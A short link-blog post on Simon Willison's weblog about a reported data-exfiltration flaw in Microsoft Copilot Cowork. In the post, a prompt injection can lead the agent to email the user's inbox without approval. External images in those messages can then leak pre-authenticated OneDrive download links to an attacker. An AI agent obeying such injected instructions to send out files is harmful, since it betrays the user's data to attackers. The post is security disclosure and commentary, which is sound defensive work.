Microsoft Copilot Cowork Exfiltrates Files

Microsoft Copilot Cowork Exfiltrates Files

Simon Willison’s Weblog

Subscribe

26th May 2026 - Link Blog

Microsoft Copilot Cowork Exfiltrates Files (via) The biggest challenge in designing agentic systems continues to be preventing them from enabling attackers to exfiltrate data.

In this case Microsoft Copilot Cowork (yes, that's a real product name) was allowing agents to send emails to the user's own inbox without approval... but those messages were then displayed in a way that could leak data to an attacker via rendered images:

Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message sent by the agent.

Since OneDrive can create pre-authenticated download links, a successful prompt injection could cause those links to be leaked, allowing files to be downloaded by the attacker.

Recent articles

Notes on Pope Leo XIV's encyclical on AI - 25th May 2026

Datasette Agent - 21st May 2026

Gemini 3.5 Flash: more expensive, but Google plan to use it for everything - 19th May 2026

This is a link post by Simon Willison, posted on 26th May 2026.

microsoft 130

security 606

ai 2037

prompt-injection 149

generative-ai 1802

llms 1768

exfiltration-attacks 44

lethal-trifecta 26

Monthly briefing

Sponsor me for $10/month and get a curated email digest of the month's most important LLM developments.

Pay me to send you less!

Sponsor & subscribe

Disclosures

Colophon

©

2002

2003

2004

2005

2006

2007

2008

2009

2010

2011

2012

2013

2014

2015

2016

2017

2018

2019

2020

2021

2022

2023

2024

2025

2026